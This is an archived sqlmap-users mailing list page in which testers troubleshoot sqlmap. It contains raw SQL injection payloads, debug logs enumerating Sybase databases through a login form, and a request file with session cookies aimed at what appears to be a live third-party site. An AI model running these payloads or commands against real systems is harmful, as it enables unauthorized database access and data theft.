sqlmap-users Mailing List for sqlmap (Page 24)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Brandon P. <bpe...@gm...> - 2014-03-30 13:49:15
|
FWIW --parse-errors also doesn't seem to affect the output during a scan on the URL. On Sun, Mar 30, 2014 at 8:33 AM, Brandon Perry <bpe...@gm...>wrote: > Hi, > > I am playing around with an interesting SQL injection. A GET to a php > script with two params (date1 and date2) will generate a PNG when > successful, but will output a textual error message when, say , an > apostrophe is thrown in one of the dates. > > > For instance, GET fdsa.php?date1=2014-02-28&date2=2014-03-30 will result > in a PNG. > > > GET fdsa.php?date1=2014-02-28&date2=2014-03-30' (note apostrophe in last > param) will yield: > > You have an error in your SQL syntax; check the manual that corresponds to > your MySQL server version for the right syntax to use near 'admin' AND > a.sid=i.sid and i.ref IN (SELECT ref from > Itablet)' at line 4 > > > GET fdsa.php?date1=2014-02-28&date1=2014-03-30'+and+'1'='1 will result in > a PNG > > > Since the result of a successful query is a PNG, I only expect to be able > to use an error-based, or boolean/time-based attacks. However, sqlmap > doesn't detect that either of the params are injectable (both are). > > [06:04:13] [WARNING] GET parameter 'date1' does not appear dynamic > [06:04:13] [WARNING] heuristic (basic) test shows that GET parameter > 'date1' might not be injectable > > > I have tried using --text-only and am not using -o, but to no avail. Any > thoughts on some tricks I can try to see if sqlmap will be able to exploit > the injection points? > > I can send a traffic file if that helps. Currently on latest. > > bperry@ubuntu:~/tools/sqlmap$ git pull > Already up-to-date. > bperry@ubuntu:~/tools/sqlmap$ > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Brandon P. <bpe...@gm...> - 2014-03-30 13:33:50
|
Hi, I am playing around with an interesting SQL injection. A GET to a php script with two params (date1 and date2) will generate a PNG when successful, but will output a textual error message when, say , an apostrophe is thrown in one of the dates. For instance, GET fdsa.php?date1=2014-02-28&date2=2014-03-30 will result in a PNG. GET fdsa.php?date1=2014-02-28&date2=2014-03-30' (note apostrophe in last param) will yield: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin' AND a.sid=i.sid and i.ref IN (SELECT ref from Itablet)' at line 4 GET fdsa.php?date1=2014-02-28&date1=2014-03-30'+and+'1'='1 will result in a PNG Since the result of a successful query is a PNG, I only expect to be able to use an error-based, or boolean/time-based attacks. However, sqlmap doesn't detect that either of the params are injectable (both are). [06:04:13] [WARNING] GET parameter 'date1' does not appear dynamic [06:04:13] [WARNING] heuristic (basic) test shows that GET parameter 'date1' might not be injectable I have tried using --text-only and am not using -o, but to no avail. Any thoughts on some tricks I can try to see if sqlmap will be able to exploit the injection points? I can send a traffic file if that helps. Currently on latest. bperry@ubuntu:~/tools/sqlmap$ git pull Already up-to-date. bperry@ubuntu:~/tools/sqlmap$ -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Visual Z. <nt...@gm...> - 2014-03-30 07:26:42
|
[15:19:32] [CRITICAL] unhandled exception in sqlmap/1.0-dev-e8c1c90, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev-e8c1c90 Python version: 2.7.6 Operating system: posix Command line: sqlmap.py -r about.txt -p title --dbs --dbms Microsoft SQL Server Technique: TIME Back-end DBMS: Microsoft SQL Server (fingerprinted) Traceback (most recent call last): File "sqlmap.py", line 95, in main start() File "/Users/ihacku/tools/sqlmap-dev/lib/controller/controller.py", line 583, in start action() File "/Users/ihacku/tools/sqlmap-dev/lib/controller/action.py", line 106, in action conf.dumper.dbs(conf.dbmsHandler.getDbs()) File "/Users/ihacku/tools/sqlmap-dev/plugins/generic/databases.py", line 120, in getDbs count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) File "/Users/ihacku/tools/sqlmap-dev/lib/request/inject.py", line 409, in getValue value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump) File "/Users/ihacku/tools/sqlmap-dev/lib/request/inject.py", line 278, in _goInferenceProxy outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) File "/Users/ihacku/tools/sqlmap-dev/lib/request/inject.py", line 126, in _goInferenceFields output = _goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump, field) File "/Users/ihacku/tools/sqlmap-dev/lib/request/inject.py", line 98, in _goInference count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar, dump) File "/Users/ihacku/tools/sqlmap-dev/lib/techniques/blind/inference.py", line 528, in bisection val = getChar(index, asciiTbl) File "/Users/ihacku/tools/sqlmap-dev/lib/techniques/blind/inference.py", line 258, in getChar forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue)) File "/Users/ihacku/tools/sqlmap-dev/lib/core/common.py", line 1501, in safeStringFormat raise Exception("wrong number of parameters during string formatting") Exception: wrong number of parameters during string formatting and here's content of about.txt POST /about17u/siteinfo/more_wzdt.asp HTTP/1.1 Content-Length: 75 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://www.17u.net/ Cookie: b2b%5Fcn%5Fmember%5Finfo=iscookiesopen=2014%2D3%2D29+19%3A26%3A52&cityhomepageId=224; ASPSESSIONIDSQQDBRRT=DNONHMDDINFHGJHPMGGKAPIB; BIGipServerwww-17u-net-pool=2114064556.9475.0000; line=showType=0; refid=1365089; BIGipServernetmvc-pool=1426198700.9475.0000; HistoryAccessSource=101; ASP.NET_SessionId=w11yjefaeqbmq1dkfmbtwtlz; historylineId=4642727~%e3%80%90%e6%b8%85%e6%98%8e%e8%8a%82%e3%80%91_%e5%8f%8c%e5%8d%a7%e5%9b%9b%e6%97%a5_%e5%a9%ba%e6%ba%90%e3%80%81%e6%b1%9f%e5%b2%ad%e6%b2%b9%e8%8f%9c%e8%8a%b1%e3%80%81%e6%99%af%e5%be%b7%e9%95%87%e3%80%81%e6%80%a1%e6%83%85%e7%94%b0%e5%9b%ad%e7%ba%af%e7%8e%a9%e6%b8%b8_%e5%8c%97%e4%ba%ac%e5%88%b0%e5%a9%ba%e6%ba%90%e6%97%85%e6%b8%b8%e6%94%bb%e7%95%a5@4642464~%e6%b8%85%e6%98%8e%e6%a1%82%e6%9e%97%e6%97%85%e6%b8%b8%e5%a4%a9%e6%b0%94_%e5%8e%a6%e9%97%a8%e5%88%b0%e6%a1%82%e6%9e%97%e6%97%85%e6%b8%b8%e6%94%bb%e7%95%a5_%e5%8e%a6%e9%97%a8%e5%88%b0%e6%a1%82%e6%9e%97%e6%97%85%e6%b8%b8%e4%bb%b7%e6%a0%bc@4632444~%e6%98%86%e6%98%8e%e5%88%b0%e6%b5%b7%e5%8d%97%e6%b5%b7%e5%8f%a3+%e8%b1%aa%e4%ba%ab%e3%80%81%e4%bc%91%e9%97%b2%e6%b8%b85%e5%a4%a9%e6%b8%b8@4429950~%e5%8d%81%e4%b8%80%e7%9f%b3%e5%ae%b6%e5%ba%84%e6%97%85%e8%a1%8c%e7%a4%be%e7%ba%bf%e8%b7%af%e5%ae%89%e6%8e%92-%e7%9f%b3%e5%ae%b6%e5%ba%84%e5%8e%bb%e4%b8%8a%e6%b5%b7-%e6%9d%ad%e5%b7%9e-%e8%8b%8f%e5%b7%9e%e6%97%85%e6%b8%b8%e5%a4%9a%e5%b0%91%e9%92%b1-%e7%9f%b3%e5%ae%b6%e5%ba%84%e5%8d%81%e4%b8%80%e5%9b%bd%e5%ba%86%e5%8e%bb%e6%97%85%e6%b8%b8@4429283~%e7%9f%b3%e5%ae%b6%e5%ba%84%e6%97%85%e8%a1%8c%e7%a4%be%e5%8d%81%e4%b8%80%e6%97%85%e6%b8%b8%e7%ba%bf%e8%b7%af%e6%8a%a5%e4%bb%b7-%e7%9f%b3%e5%ae%b6%e5%ba%84%e5%8e%bb%e4%b9%9d%e5%af%a8%e6%b2%9f%e6%97%85%e6%b8%b8%e5%a4%9a%e5%b0%91%e9%92%b1-%e6%88%90%e9%83%bd%e3%80%81%e9%bb%84%e9%be%99%e3%80%81%e4%b9%9d%e5%af%a8%e6%b2%9f%e5%8f%8c%e9%a3%9e%e4%ba%94%e6%97%a5%e6%b8%b8; ASPSESSIONIDSQRDBQRS=KDBKIDEDPEBEHLHAIACMPAKL; NETSEInfo=RefId=1365089&SEFrom=&SEKeyWords=&RefUrl=; BIGipServerzuche-rujia365-com-pool=2550245568.20480.0000; B2bCnMemberLogStat=; sto-id-lvyou.17u.net_gs=JJAAKIMA; b2b%5Fcn%5Fmember%5Finfo=cityhomepageId=224&iscookiesopen=2014%2D3%2D29+19%3A41%3A21; latestEnquiryPage=1; latestQuotePage=1; ASPSESSIONIDQSQDARRS=LHGDJKEDGHACPAEKOBKAHILP; ASPSESSIONIDSSTDCTSQ=LJKPJBFDOBHKGEJDFPICJEEP; ASPSESSIONIDQQQDARRS=OLBLKIFDAJGDMMBHLDICCCNK Host: www.17u.net Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* search=%cb%d1%20%cb%f7&title=1 |
|
From: Miroslav S. <mir...@gm...> - 2014-03-25 18:59:58
|
Strange thing is that you are not getting anything with --parse-errors as you are dealing with a "missing database" problem inlined with error-based technique. Can you please send a traffic file (if you want you can send it privately to me) for that same run (where you've used --parse-errors)? Bye On Tue, Mar 25, 2014 at 7:55 PM, Richard Whitcroft <rwh...@gm...>wrote: > Sure. The --parse-errors switch doesn't seem to produce anything > additional? I added -v3 just in case. > > -- > $ python sqlmap.py ... --dbms=sybase --batch --technique=E --threads=8 > --fresh-queries -D ENERGY_MASTER --tables --parse-errors -v3 > > sqlmap/1.0-dev-59d667d - automatic SQL injection and database takeover > tool > http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior > mutual consent is illegal. It is the end user's responsibility to obey all > applicable local, state and federal laws. Developers assume no liability > and are not responsible for any misuse or damage caused by this program > > [*] starting at 14:46:47 > > [14:46:47] [DEBUG] cleaning up configuration parameters > [14:46:47] [DEBUG] setting the HTTP timeout > [14:46:47] [DEBUG] setting the HTTP method to POST > [14:46:47] [DEBUG] creating HTTP requests opener object > [14:46:47] [DEBUG] forcing back-end DBMS to user defined value > [14:46:47] [INFO] testing connection to the target URL > [14:46:47] [DEBUG] declared web page charset 'utf-8' > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: POST > Parameter: ctl00$ContentPlaceHolder1$SignInEmailAddressTextbox > Type: error-based > Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING > clause > Payload: ... > Vector: AND [RANDNUM]=CONVERT(INT,(SELECT > '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) > --- > [14:46:47] [INFO] testing Sybase > [14:46:47] [PAYLOAD] rw8...@gm...' AND 6746=CONVERT(INT,(SELECT > CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN > (@@transtate=@@transtate) THEN CHAR(49) ELSE CHAR(48) > END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'eeea'='eeea > [14:46:48] [WARNING] reflective value(s) found and filtering out > [14:46:48] [DEBUG] performed 1 queries in 0.47 seconds > [14:46:48] [INFO] confirming Sybase > [14:46:48] [PAYLOAD] rw8...@gm...' AND 6332=CONVERT(INT,(SELECT > CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN > (suser_id()=suser_id()) THEN CHAR(49) ELSE CHAR(48) > END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'lqSO'='lqSO > [14:46:48] [DEBUG] performed 1 queries in 0.45 seconds > [14:46:48] [INFO] the back-end DBMS is Sybase > web server operating system: Windows Vista > web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0 > back-end DBMS: Sybase > [14:46:48] [INFO] fetching tables for database: ENERGY_MASTER > [14:46:48] [PAYLOAD] rw8...@gm...' AND 5371=CONVERT(INT,(SELECT > CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT > ISNULL(CONVERT(VARCHAR(4000),COUNT(*)),CHAR(32)) FROM (SELECT name FROM > ENERGY_MASTER..sysobjects WHERE type IN (CHAR(85))) AS > Legi)+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'idET'='idET > [14:46:49] [DEBUG] performed 1 queries in 0.46 seconds > [14:46:49] [WARNING] in case of continuous data retrieval problems you are > advised to try a switch '--no-cast' or switch '--hex' > No tables found > [14:46:49] [INFO] fetched data logged to text files under > '/opt/sqlmap/output/xxx' > > [*] shutting down at 14:46:49 > -- > > $ python sqlmap.py ... --dbs > > [14:50:13] [INFO] testing Sybase > [14:50:14] [WARNING] reflective value(s) found and filtering out > [14:50:14] [INFO] confirming Sybase > [14:50:14] [INFO] the back-end DBMS is Sybase > web server operating system: Windows Vista > web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0 > back-end DBMS: Sybase > [14:50:14] [INFO] fetching database names > [14:50:14] [INFO] retrieved: 13 > [14:50:14] [INFO] fetching number of distinct values for column 'nRfs.name' > [14:50:15] [INFO] retrieved: 13 > [14:50:15] [INFO] using column 'nRfs.name' as a pivot for retrieving row > data > [14:50:15] [INFO] retrieved: AR1 > [14:50:16] [INFO] retrieved: AR10 > [14:50:16] [INFO] retrieved: AR100TST > [14:50:17] [INFO] retrieved: AR15 > [14:50:17] [INFO] retrieved: AR710 > [14:50:18] [INFO] retrieved: AR710TST > [14:50:18] [INFO] retrieved: ENERGY_MASTER > [14:50:19] [INFO] retrieved: master > [14:50:20] [INFO] retrieved: model > [14:50:20] [INFO] retrieved: olympus > [14:50:21] [INFO] retrieved: sybsystemdb > [14:50:21] [INFO] retrieved: sybsystemprocs > [14:50:22] [INFO] retrieved: tempdb > > > > On 25 March 2014 14:22, Miroslav Stampar <mir...@gm...>wrote: > >> Hi. >> >> Can you please copy/paste the console output you get for sqlmap run with: >> >> python sqlmap.py ... -D ENERGY --tables --parse-errors >> >> Also, for: >> >> python sqlmap.py ... --dbs >> >> Bye >> On Mar 25, 2014 7:16 PM, "les paul" <rw8...@gm...> wrote: >> >>> Hi all, >>> >>> I'm running into trouble with sqlmap against a Sybase db. Here's the >>> fingerprint: >>> >>> Adaptive Server Enterprise/15.0.3/EBF 17770 ESD#4/P/x86_64/Enterprise >>> Linux/ase1503/2768/64-bit/FBO/Thu Aug 26 09:54:27 2010 >>> >>> The technique I'm using is error-based through a POST to a vulnerable >>> .aspx page. I am able to enumerate the master db, but not the user tables, >>> which are what I want. >>> >>> $ ./sqlmap.py -u xxx -d "huge_asp_net_viewstate&theparam=blah" >>> --dbms=sybase --threads=8 --batch --technique=E -D master --tables >>> >>> This produces 58 tables, mostly sys* and some mon* which seem standard. >>> I can dump the sysobjects table using -D and -T, etc. >>> >>> The web app is querying a database we'll call "ENERGY". If I try to "-D >>> ENERGY --tables", I get "No tables found, try using --hex or --no-cast >>> blahblah" (which don't work). >>> >>> I used -v4 to look closely at the requests, and see sqlmap is prefixing >>> the tablenames with "ENERGY.dbo." or sometimes just "ENERGY..", which after >>> experimenting I found doesn't work, so I wrote a small tamper script to >>> strip off "ENERGY.." and "ENERGY.dbo." - this lets me pull the column names >>> from the user tables (type='U'), but I'm still not able to get at the >>> actual data/rows in the tables. >>> >>> I know it must be possible because the web app is definitely querying >>> the tables to validate a login (this is a sqli vuln in a login form, heh). >>> >>> I'm not even sure this is really a bug in sqlmap - maybe something odd >>> in the way the database is built or something. I just thought I'd ask in >>> case anyone has had success using sqlmap against a similar Sybase db and >>> has some tips or suggestions. >>> >>> Thanks for reading - I can provide more information if anyone's >>> interested. >>> >>> >>> ------------------------------------------------------------------------------ >>> Learn Graph Databases - Download FREE O'Reilly Book >>> "Graph Databases" is the definitive new guide to graph databases and >>> their >>> applications. Written by three acclaimed leaders in the field, >>> this first edition is now available. Download your free book today! >>> http://p.sf.net/sfu/13534_NeoTech >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> > -- Miroslav Stampar http://about.me/stamparm |
|
From: Richard W. <rwh...@gm...> - 2014-03-25 18:55:53
|
Sure. The --parse-errors switch doesn't seem to produce anything
additional? I added -v3 just in case.
--
$ python sqlmap.py ... --dbms=sybase --batch --technique=E --threads=8
--fresh-queries -D ENERGY_MASTER --tables --parse-errors -v3
sqlmap/1.0-dev-59d667d - automatic SQL injection and database takeover
tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting at 14:46:47
[14:46:47] [DEBUG] cleaning up configuration parameters
[14:46:47] [DEBUG] setting the HTTP timeout
[14:46:47] [DEBUG] setting the HTTP method to POST
[14:46:47] [DEBUG] creating HTTP requests opener object
[14:46:47] [DEBUG] forcing back-end DBMS to user defined value
[14:46:47] [INFO] testing connection to the target URL
[14:46:47] [DEBUG] declared web page charset 'utf-8'
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: POST
Parameter: ctl00$ContentPlaceHolder1$SignInEmailAddressTextbox
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause
Payload: ...
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT
'[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
---
[14:46:47] [INFO] testing Sybase
[14:46:47] [PAYLOAD] rw8...@gm...' AND 6746=CONVERT(INT,(SELECT
CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN
(@@transtate=@@transtate) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'eeea'='eeea
[14:46:48] [WARNING] reflective value(s) found and filtering out
[14:46:48] [DEBUG] performed 1 queries in 0.47 seconds
[14:46:48] [INFO] confirming Sybase
[14:46:48] [PAYLOAD] rw8...@gm...' AND 6332=CONVERT(INT,(SELECT
CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN
(suser_id()=suser_id()) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'lqSO'='lqSO
[14:46:48] [DEBUG] performed 1 queries in 0.45 seconds
[14:46:48] [INFO] the back-end DBMS is Sybase
web server operating system: Windows Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Sybase
[14:46:48] [INFO] fetching tables for database: ENERGY_MASTER
[14:46:48] [PAYLOAD] rw8...@gm...' AND 5371=CONVERT(INT,(SELECT
CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT
ISNULL(CONVERT(VARCHAR(4000),COUNT(*)),CHAR(32)) FROM (SELECT name FROM
ENERGY_MASTER..sysobjects WHERE type IN (CHAR(85))) AS
Legi)+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'idET'='idET
[14:46:49] [DEBUG] performed 1 queries in 0.46 seconds
[14:46:49] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
No tables found
[14:46:49] [INFO] fetched data logged to text files under
'/opt/sqlmap/output/xxx'
[*] shutting down at 14:46:49
--
$ python sqlmap.py ... --dbs
[14:50:13] [INFO] testing Sybase
[14:50:14] [WARNING] reflective value(s) found and filtering out
[14:50:14] [INFO] confirming Sybase
[14:50:14] [INFO] the back-end DBMS is Sybase
web server operating system: Windows Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Sybase
[14:50:14] [INFO] fetching database names
[14:50:14] [INFO] retrieved: 13
[14:50:14] [INFO] fetching number of distinct values for column 'nRfs.name'
[14:50:15] [INFO] retrieved: 13
[14:50:15] [INFO] using column 'nRfs.name' as a pivot for retrieving row
data
[14:50:15] [INFO] retrieved: AR1
[14:50:16] [INFO] retrieved: AR10
[14:50:16] [INFO] retrieved: AR100TST
[14:50:17] [INFO] retrieved: AR15
[14:50:17] [INFO] retrieved: AR710
[14:50:18] [INFO] retrieved: AR710TST
[14:50:18] [INFO] retrieved: ENERGY_MASTER
[14:50:19] [INFO] retrieved: master
[14:50:20] [INFO] retrieved: model
[14:50:20] [INFO] retrieved: olympus
[14:50:21] [INFO] retrieved: sybsystemdb
[14:50:21] [INFO] retrieved: sybsystemprocs
[14:50:22] [INFO] retrieved: tempdb
On 25 March 2014 14:22, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> Can you please copy/paste the console output you get for sqlmap run with:
>
> python sqlmap.py ... -D ENERGY --tables --parse-errors
>
> Also, for:
>
> python sqlmap.py ... --dbs
>
> Bye
> On Mar 25, 2014 7:16 PM, "les paul" <rw8...@gm...> wrote:
>
>> Hi all,
>>
>> I'm running into trouble with sqlmap against a Sybase db. Here's the
>> fingerprint:
>>
>> Adaptive Server Enterprise/15.0.3/EBF 17770 ESD#4/P/x86_64/Enterprise
>> Linux/ase1503/2768/64-bit/FBO/Thu Aug 26 09:54:27 2010
>>
>> The technique I'm using is error-based through a POST to a vulnerable
>> .aspx page. I am able to enumerate the master db, but not the user tables,
>> which are what I want.
>>
>> $ ./sqlmap.py -u xxx -d "huge_asp_net_viewstate&theparam=blah"
>> --dbms=sybase --threads=8 --batch --technique=E -D master --tables
>>
>> This produces 58 tables, mostly sys* and some mon* which seem standard. I
>> can dump the sysobjects table using -D and -T, etc.
>>
>> The web app is querying a database we'll call "ENERGY". If I try to "-D
>> ENERGY --tables", I get "No tables found, try using --hex or --no-cast
>> blahblah" (which don't work).
>>
>> I used -v4 to look closely at the requests, and see sqlmap is prefixing
>> the tablenames with "ENERGY.dbo." or sometimes just "ENERGY..", which after
>> experimenting I found doesn't work, so I wrote a small tamper script to
>> strip off "ENERGY.." and "ENERGY.dbo." - this lets me pull the column names
>> from the user tables (type='U'), but I'm still not able to get at the
>> actual data/rows in the tables.
>>
>> I know it must be possible because the web app is definitely querying the
>> tables to validate a login (this is a sqli vuln in a login form, heh).
>>
>> I'm not even sure this is really a bug in sqlmap - maybe something odd in
>> the way the database is built or something. I just thought I'd ask in case
>> anyone has had success using sqlmap against a similar Sybase db and has
>> some tips or suggestions.
>>
>> Thanks for reading - I can provide more information if anyone's
>> interested.
>>
>>
>> ------------------------------------------------------------------------------
>> Learn Graph Databases - Download FREE O'Reilly Book
>> "Graph Databases" is the definitive new guide to graph databases and their
>> applications. Written by three acclaimed leaders in the field,
>> this first edition is now available. Download your free book today!
>> http://p.sf.net/sfu/13534_NeoTech
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
|
|
From: Miroslav S. <mir...@gm...> - 2014-03-25 18:22:53
|
Hi. Can you please copy/paste the console output you get for sqlmap run with: python sqlmap.py ... -D ENERGY --tables --parse-errors Also, for: python sqlmap.py ... --dbs Bye On Mar 25, 2014 7:16 PM, "les paul" <rw8...@gm...> wrote: > Hi all, > > I'm running into trouble with sqlmap against a Sybase db. Here's the > fingerprint: > > Adaptive Server Enterprise/15.0.3/EBF 17770 ESD#4/P/x86_64/Enterprise > Linux/ase1503/2768/64-bit/FBO/Thu Aug 26 09:54:27 2010 > > The technique I'm using is error-based through a POST to a vulnerable > .aspx page. I am able to enumerate the master db, but not the user tables, > which are what I want. > > $ ./sqlmap.py -u xxx -d "huge_asp_net_viewstate&theparam=blah" > --dbms=sybase --threads=8 --batch --technique=E -D master --tables > > This produces 58 tables, mostly sys* and some mon* which seem standard. I > can dump the sysobjects table using -D and -T, etc. > > The web app is querying a database we'll call "ENERGY". If I try to "-D > ENERGY --tables", I get "No tables found, try using --hex or --no-cast > blahblah" (which don't work). > > I used -v4 to look closely at the requests, and see sqlmap is prefixing > the tablenames with "ENERGY.dbo." or sometimes just "ENERGY..", which after > experimenting I found doesn't work, so I wrote a small tamper script to > strip off "ENERGY.." and "ENERGY.dbo." - this lets me pull the column names > from the user tables (type='U'), but I'm still not able to get at the > actual data/rows in the tables. > > I know it must be possible because the web app is definitely querying the > tables to validate a login (this is a sqli vuln in a login form, heh). > > I'm not even sure this is really a bug in sqlmap - maybe something odd in > the way the database is built or something. I just thought I'd ask in case > anyone has had success using sqlmap against a similar Sybase db and has > some tips or suggestions. > > Thanks for reading - I can provide more information if anyone's interested. > > > ------------------------------------------------------------------------------ > Learn Graph Databases - Download FREE O'Reilly Book > "Graph Databases" is the definitive new guide to graph databases and their > applications. Written by three acclaimed leaders in the field, > this first edition is now available. Download your free book today! > http://p.sf.net/sfu/13534_NeoTech > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: les p. <rw8...@gm...> - 2014-03-25 18:15:33
|
Hi all, I'm running into trouble with sqlmap against a Sybase db. Here's the fingerprint: Adaptive Server Enterprise/15.0.3/EBF 17770 ESD#4/P/x86_64/Enterprise Linux/ase1503/2768/64-bit/FBO/Thu Aug 26 09:54:27 2010 The technique I'm using is error-based through a POST to a vulnerable .aspx page. I am able to enumerate the master db, but not the user tables, which are what I want. $ ./sqlmap.py -u xxx -d "huge_asp_net_viewstate&theparam=blah" --dbms=sybase --threads=8 --batch --technique=E -D master --tables This produces 58 tables, mostly sys* and some mon* which seem standard. I can dump the sysobjects table using -D and -T, etc. The web app is querying a database we'll call "ENERGY". If I try to "-D ENERGY --tables", I get "No tables found, try using --hex or --no-cast blahblah" (which don't work). I used -v4 to look closely at the requests, and see sqlmap is prefixing the tablenames with "ENERGY.dbo." or sometimes just "ENERGY..", which after experimenting I found doesn't work, so I wrote a small tamper script to strip off "ENERGY.." and "ENERGY.dbo." - this lets me pull the column names from the user tables (type='U'), but I'm still not able to get at the actual data/rows in the tables. I know it must be possible because the web app is definitely querying the tables to validate a login (this is a sqli vuln in a login form, heh). I'm not even sure this is really a bug in sqlmap - maybe something odd in the way the database is built or something. I just thought I'd ask in case anyone has had success using sqlmap against a similar Sybase db and has some tips or suggestions. Thanks for reading - I can provide more information if anyone's interested. |
|
From: Brandon P. <bpe...@gm...> - 2014-03-21 18:26:51
|
